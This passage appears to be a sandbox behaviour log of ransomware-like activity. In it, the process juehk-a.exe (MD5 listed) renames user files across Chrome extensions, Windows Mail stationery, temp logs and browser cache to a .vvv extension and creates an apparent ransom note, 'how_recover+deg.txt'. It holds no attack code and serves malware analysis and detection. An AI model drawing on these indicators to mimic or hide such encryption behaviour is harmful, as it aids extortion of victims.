36266.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_16.png
36267.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\icon_16.png.vvv
36268.            ads:
36269.          fid (ads:): 844424930218236
36270.          ntstatus: 0x0
36271.          CreateOptions: 0x0
36272.        file:
36273.          timestamp: 190632
36274.          mode: rename
36275.          sequenceNumber: 2538
36276.          filesize: 494
36277.          processinfo:
36278.            pid: 1648
36279.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36280.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36281.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\main.js
36282.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\main.js.vvv
36283.            ads:
36284.          fid (ads:): 1125899906928856
36285.          ntstatus: 0x0
36286.          CreateOptions: 0x0
36287.        file:
36288.          timestamp: 190711
36289.          mode: rename
36290.          sequenceNumber: 2539
36291.          filesize: 8078
36292.          processinfo:
36293.            pid: 1648
36294.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36295.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36296.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\128.png
36297.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\128.png.vvv
36298.            ads:
36299.          fid (ads:): 1407374883639490
36300.          ntstatus: 0x0
36301.          CreateOptions: 0x0
36302.        file:
36303.          timestamp: 191196
36304.          mode: rename
36305.          sequenceNumber: 2540
36306.          filesize: 3950
36307.          processinfo:
36308.            pid: 1648
36309.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36310.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36311.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\128.png
36312.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\128.png.vvv
36313.            ads:
36314.          fid (ads:): 1688849860350098
36315.          ntstatus: 0x0
36316.          CreateOptions: 0x0
36317.        file:
36318.          timestamp: 191726
36319.          mode: rename
36320.          sequenceNumber: 2541
36321.          filesize: 5790
36322.          processinfo:
36323.            pid: 1648
36324.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36325.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36326.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png
36327.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\128.png.vvv
36328.            ads:
36329.          fid (ads:): 1407374883639496
36330.          ntstatus: 0x0
36331.          CreateOptions: 0x0
36332.        file:
36333.          timestamp: 191743
36334.          mode: rename
36335.          sequenceNumber: 2542
36336.          filesize: 926
36337.          processinfo:
36338.            pid: 1648
36339.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36340.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36341.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png
36342.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\16.png.vvv
36343.            ads:
36344.          fid (ads:): 1407374883639501
36345.          ntstatus: 0x0
36346.          CreateOptions: 0x0
36347.        file:
36348.          timestamp: 191780
36349.          mode: rename
36350.          sequenceNumber: 2543
36351.          filesize: 1566
36352.          processinfo:
36353.            pid: 1648
36354.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36356.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png
36357.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\32.png.vvv
36358.            ads:
36359.          fid (ads:): 2533274790482132
36360.          ntstatus: 0x0
36361.          CreateOptions: 0x0
36362.        file:
36363.          timestamp: 191798
36364.          mode: rename
36365.          sequenceNumber: 2544
36366.          filesize: 2286
36367.          processinfo:
36368.            pid: 1648
36369.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36370.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36371.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png
36372.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\48.png.vvv
36373.            ads:
36374.          fid (ads:): 844424930218585
36375.          ntstatus: 0x0
36376.          CreateOptions: 0x0
36377.        file:
36378.          timestamp: 191930
36379.          mode: rename
36380.          sequenceNumber: 2545
36381.          filesize: 6350
36382.          processinfo:
36383.            pid: 1648
36384.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36386.          old_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\128.png
36387.          new_name: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\128.png.vvv
36388.            ads:
36389.          fid (ads:): 1125899906928873
36390.          ntstatus: 0x0
36391.          CreateOptions: 0x0
36392.        file:
36393.          timestamp: 192338
36394.          mode: rename
36395.          sequenceNumber: 2546
36396.          filesize: 6334
36397.          processinfo:
36398.            pid: 1648
36399.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36400.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36401.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
36402.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.vvv
36403.            ads:
36404.          fid (ads:): 2533274790471192
36405.          ntstatus: 0x0
36406.          CreateOptions: 0x0
36407.        file:
36408.          timestamp: 192510
36409.          repeat: 20000
36410.          mode: created
36411.          sequenceNumber: 2547
36412.          value: C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\how_recover+deg.txt
36413.          processinfo:
36414.            pid: 1648
36415.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36416.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36417.            ads:
36418.          fid (ads:): 562949953540965
36419.          ntstatus: 0x0
36420.          CreateOptions: 0x60
36421.        file:
36422.          timestamp: 192689
36423.          mode: rename
36424.          sequenceNumber: 2548
36425.          filesize: 121710
36426.          processinfo:
36427.            pid: 1648
36428.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36429.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36430.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22NAGU7G\contentHXS[1].js
36431.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\22NAGU7G\contentHXS[1].js.vvv
36432.            ads:
36433.          fid (ads:): 1125899906859502
36434.          ntstatus: 0x0
36435.          CreateOptions: 0x0
36436.        file:
36437.          timestamp: 192733
36438.          mode: rename
36439.          sequenceNumber: 2549
36440.          filesize: 766
36441.          processinfo:
36442.            pid: 1648
36443.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36444.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36445.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\ontrtl[1].css
36446.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\ontrtl[1].css.vvv
36447.            ads:
36448.          fid (ads:): 1125899906917511
36449.          ntstatus: 0x0
36450.          CreateOptions: 0x0
36451.        file:
36452.          timestamp: 192766
36453.          mode: rename
36454.          sequenceNumber: 2550
36455.          filesize: 2542
36456.          processinfo:
36457.            pid: 1648
36458.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36459.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36460.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\script[1].js
36461.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AOS51X5J\script[1].js.vvv
36462.            ads:
36463.          fid (ads:): 1125899906859501
36464.          ntstatus: 0x0
36465.          CreateOptions: 0x0
36466.        file:
36467.          timestamp: 192815
36468.          mode: rename
36469.          sequenceNumber: 2551
36470.          filesize: 6110
36471.          processinfo:
36472.            pid: 1648
36473.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36474.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36475.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J3KBCJOQ\ont[1].css
36476.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J3KBCJOQ\ont[1].css.vvv
36477.            ads:
36478.          fid (ads:): 844424930150203
36479.          ntstatus: 0x0
36480.          CreateOptions: 0x0
36481.        file:
36482.          timestamp: 192865
36483.          mode: rename
36484.          sequenceNumber: 2552
36485.          filesize: 39550
36486.          processinfo:
36487.            pid: 1648
36488.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36489.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36490.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SFKZXRFL\contentHXS[1].css
36491.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SFKZXRFL\contentHXS[1].css.vvv
36492.            ads:
36493.          fid (ads:): 1125899906859503
36494.          ntstatus: 0x0
36495.          CreateOptions: 0x0
36496.        file:
36497.          timestamp: 193589
36498.          mode: rename
36499.          sequenceNumber: 2553
36500.          filesize: 1502
36501.          processinfo:
36502.            pid: 1648
36503.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36504.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36505.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
36506.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.vvv
36507.            ads:
36508.          fid (ads:): 562949953439260
36509.          ntstatus: 0x0
36510.          CreateOptions: 0x0
36511.        file:
36512.          timestamp: 193689
36513.          mode: rename
36514.          sequenceNumber: 2554
36515.          filesize: 2990
36516.          processinfo:
36517.            pid: 1648
36518.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36519.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36520.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
36521.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.vvv
36522.            ads:
36523.          fid (ads:): 562949953439262
36524.          ntstatus: 0x0
36525.          CreateOptions: 0x0
36526.        file:
36527.          timestamp: 193778
36528.          mode: rename
36529.          sequenceNumber: 2555
36530.          filesize: 24286
36531.          processinfo:
36532.            pid: 1648
36533.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36535.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
36536.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.vvv
36537.            ads:
36538.          fid (ads:): 562949953439456
36539.          ntstatus: 0x0
36540.          CreateOptions: 0x0
36541.        file:
36542.          timestamp: 193845
36543.          mode: rename
36544.          sequenceNumber: 2556
36545.          filesize: 6830
36546.          processinfo:
36547.            pid: 1648
36548.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36550.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
36551.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.vvv
36552.            ads:
36553.          fid (ads:): 562949953439571
36554.          ntstatus: 0x0
36555.          CreateOptions: 0x0
36556.        file:
36557.          timestamp: 193938
36558.          mode: rename
36559.          sequenceNumber: 2557
36560.          filesize: 4638
36561.          processinfo:
36562.            pid: 1648
36563.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36564.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36565.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
36566.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.vvv
36567.            ads:
36568.          fid (ads:): 562949953439798
36569.          ntstatus: 0x0
36570.          CreateOptions: 0x0
36571.        file:
36572.          timestamp: 193990
36573.          mode: rename
36574.          sequenceNumber: 2558
36575.          filesize: 2638
36576.          processinfo:
36577.            pid: 1648
36578.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36579.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36580.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
36581.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.vvv
36582.            ads:
36583.          fid (ads:): 562949953439802
36584.          ntstatus: 0x0
36585.          CreateOptions: 0x0
36586.        file:
36587.          timestamp: 194005
36588.          mode: rename
36589.          sequenceNumber: 2559
36590.          filesize: 3374
36591.          processinfo:
36592.            pid: 1648
36593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36595.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
36596.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.vvv
36597.            ads:
36598.          fid (ads:): 562949953439880
36599.          ntstatus: 0x0
36600.          CreateOptions: 0x0
36601.        file:
36602.          timestamp: 194032
36603.          mode: rename
36604.          sequenceNumber: 2560
36605.          filesize: 6798
36606.          processinfo:
36607.            pid: 1648
36608.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36609.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36610.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
36611.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.vvv
36612.            ads:
36613.          fid (ads:): 562949953439884
36614.          ntstatus: 0x0
36615.          CreateOptions: 0x0
36616.        file:
36617.          timestamp: 194044
36618.          mode: rename
36619.          sequenceNumber: 2561
36620.          filesize: 5534
36621.          processinfo:
36622.            pid: 1648
36623.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36624.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36625.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
36626.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.vvv
36627.            ads:
36628.          fid (ads:): 562949953439889
36629.          ntstatus: 0x0
36630.          CreateOptions: 0x0
36631.        file:
36632.          timestamp: 194056
36633.          mode: rename
36634.          sequenceNumber: 2562
36635.          filesize: 4398
36636.          processinfo:
36637.            pid: 1648
36638.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36639.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36640.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
36641.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.vvv
36642.            ads:
36643.          fid (ads:): 562949953439891
36644.          ntstatus: 0x0
36645.          CreateOptions: 0x0
36646.        file:
36647.          timestamp: 194070
36648.          mode: rename
36649.          sequenceNumber: 2563
36650.          filesize: 5534
36651.          processinfo:
36652.            pid: 1648
36653.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36654.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36655.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
36656.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.vvv
36657.            ads:
36658.          fid (ads:): 562949953439893
36659.          ntstatus: 0x0
36660.          CreateOptions: 0x0
36661.        file:
36662.          timestamp: 194099
36663.          mode: rename
36664.          sequenceNumber: 2564
36665.          filesize: 14478
36666.          processinfo:
36667.            pid: 1648
36668.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36669.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36670.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
36671.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.vvv
36672.            ads:
36673.          fid (ads:): 562949953439895
36674.          ntstatus: 0x0
36675.          CreateOptions: 0x0
36676.        file:
36677.          timestamp: 194168
36678.          mode: rename
36679.          sequenceNumber: 2565
36680.          filesize: 2350
36681.          processinfo:
36682.            pid: 1648
36683.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36684.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36685.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
36686.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.vvv
36687.            ads:
36688.          fid (ads:): 562949953439968
36689.          ntstatus: 0x0
36690.          CreateOptions: 0x0
36691.        file:
36692.          timestamp: 194432
36693.          mode: rename
36694.          sequenceNumber: 2566
36695.          filesize: 16206
36696.          processinfo:
36697.            pid: 1648
36698.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36699.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36700.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
36701.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.vvv
36702.            ads:
36703.          fid (ads:): 562949953440330
36704.          ntstatus: 0x0
36705.          CreateOptions: 0x0
36706.        file:
36707.          timestamp: 194481
36708.          mode: rename
36709.          sequenceNumber: 2567
36710.          filesize: 5150
36711.          processinfo:
36712.            pid: 1648
36713.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36714.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36715.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
36716.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.vvv
36717.            ads:
36718.          fid (ads:): 562949953441253
36719.          ntstatus: 0x0
36720.          CreateOptions: 0x0
36721.        file:
36722.          timestamp: 194516
36723.          mode: rename
36724.          sequenceNumber: 2568
36725.          filesize: 2414
36726.          processinfo:
36727.            pid: 1648
36728.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36729.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36730.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
36731.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.vvv
36732.            ads:
36733.          fid (ads:): 562949953441259
36734.          ntstatus: 0x0
36735.          CreateOptions: 0x0
36736.        file:
36737.          timestamp: 194549
36738.          mode: rename
36739.          sequenceNumber: 2569
36740.          filesize: 10990
36741.          processinfo:
36742.            pid: 1648
36743.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36744.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36745.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
36746.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.vvv
36747.            ads:
36748.          fid (ads:): 562949953441712
36749.          ntstatus: 0x0
36750.          CreateOptions: 0x0
36751.        file:
36752.          timestamp: 194584
36753.          mode: rename
36754.          sequenceNumber: 2570
36755.          filesize: 7934
36756.          processinfo:
36757.            pid: 1648
36758.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36759.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36760.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
36761.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.vvv
36762.            ads:
36763.          fid (ads:): 562949953441916
36764.          ntstatus: 0x0
36765.          CreateOptions: 0x0
36766.        file:
36767.          timestamp: 194608
36768.          mode: rename
36769.          sequenceNumber: 2571
36770.          filesize: 4078
36771.          processinfo:
36772.            pid: 1648
36773.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36774.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36775.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
36776.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.vvv
36777.            ads:
36778.          fid (ads:): 844424930152587
36779.          ntstatus: 0x0
36780.          CreateOptions: 0x0
36781.        file:
36782.          timestamp: 194639
36783.          mode: rename
36784.          sequenceNumber: 2572
36785.          filesize: 3598
36786.          processinfo:
36787.            pid: 1648
36788.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36789.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36790.          old_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
36791.          new_name: C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.vvv
36792.            ads:
36793.          fid (ads:): 562949953441949
36794.          ntstatus: 0x0
36795.          CreateOptions: 0x0
36796.        file:
36797.          timestamp: 194893
36798.          mode: rename
36799.          sequenceNumber: 2573
36800.          filesize: 782
36801.          processinfo:
36802.            pid: 1648
36803.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36804.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36805.          old_name: C:\Users\Administrator\AppData\Local\Temp\AUCHECK_PARSER.txt
36806.          new_name: C:\Users\Administrator\AppData\Local\Temp\AUCHECK_PARSER.txt.vvv
36807.            ads:
36808.          fid (ads:): 562949953509057
36809.          ntstatus: 0x0
36810.          CreateOptions: 0x0
36811.        file:
36812.          timestamp: 194927
36813.          mode: rename
36814.          sequenceNumber: 2574
36815.          filesize: 1550
36816.          processinfo:
36817.            pid: 1648
36818.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36819.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36820.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_dotNetFx4_5_2_Full_x86_x64_decompression_log.txt
36821.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_dotNetFx4_5_2_Full_x86_x64_decompression_log.txt.vvv
36822.            ads:
36823.          fid (ads:): 1970324837066728
36824.          ntstatus: 0x0
36825.          CreateOptions: 0x0
36826.        file:
36827.          timestamp: 194960
36828.          mode: rename
36829.          sequenceNumber: 2575
36830.          filesize: 2174
36831.          processinfo:
36832.            pid: 1648
36833.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36834.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36835.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_SetupUtility.txt
36836.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_SetupUtility.txt.vvv
36837.            ads:
36838.          fid (ads:): 844424930224374
36839.          ntstatus: 0x0
36840.          CreateOptions: 0x0
36841.        file:
36842.          timestamp: 195468
36843.          mode: rename
36844.          sequenceNumber: 2576
36845.          filesize: 412286
36846.          processinfo:
36847.            pid: 1648
36848.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36849.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36850.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI1219.txt
36851.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI1219.txt.vvv
36852.            ads:
36853.          fid (ads:): 844424930148838
36854.          ntstatus: 0x0
36855.          CreateOptions: 0x0
36856.        file:
36857.          timestamp: 195729
36858.          mode: rename
36859.          sequenceNumber: 2577
36860.          filesize: 363934
36861.          processinfo:
36862.            pid: 1648
36863.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36864.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36865.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI307A.txt
36866.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI307A.txt.vvv
36867.            ads:
36868.          fid (ads:): 1125899906923633
36869.          ntstatus: 0x0
36870.          CreateOptions: 0x0
36871.        file:
36872.          timestamp: 195872
36873.          mode: rename
36874.          sequenceNumber: 2578
36875.          filesize: 425006
36876.          processinfo:
36877.            pid: 1648
36878.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36880.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI53BC.txt
36881.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistMSI53BC.txt.vvv
36882.            ads:
36883.          fid (ads:): 844424930230594
36884.          ntstatus: 0x0
36885.          CreateOptions: 0x0
36886.        file:
36887.          timestamp: 195903
36888.          mode: rename
36889.          sequenceNumber: 2579
36890.          filesize: 11870
36891.          processinfo:
36892.            pid: 1648
36893.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36894.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36895.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI1219.txt
36896.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI1219.txt.vvv
36897.            ads:
36898.          fid (ads:): 844424930148837
36899.          ntstatus: 0x0
36900.          CreateOptions: 0x0
36901.        file:
36902.          timestamp: 195946
36903.          mode: rename
36904.          sequenceNumber: 2580
36905.          filesize: 11598
36906.          processinfo:
36907.            pid: 1648
36908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36910.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI307A.txt
36911.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI307A.txt.vvv
36912.            ads:
36913.          fid (ads:): 844424930212976
36914.          ntstatus: 0x0
36915.          CreateOptions: 0x0
36916.        file:
36917.          timestamp: 196002
36918.          mode: rename
36919.          sequenceNumber: 2581
36920.          filesize: 11838
36921.          processinfo:
36922.            pid: 1648
36923.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36924.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
36925.          old_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI53BC.txt
36926.          new_name: C:\Users\Administrator\AppData\Local\Temp\dd_vcredistUI53BC.txt.vvv
36927.            ads:
36928.          fid (ads:): 844424930230593
36929.          ntstatus: 0x0
36930.          CreateOptions: 0x0
36931.        file:
36932.          timestamp: 196061
36933.          mode: rename
36934.          sequenceNumber: 2582
36935.          filesize: 7438
36936.          processinfo:
36937.            pid: 1648
36938.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
36939.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
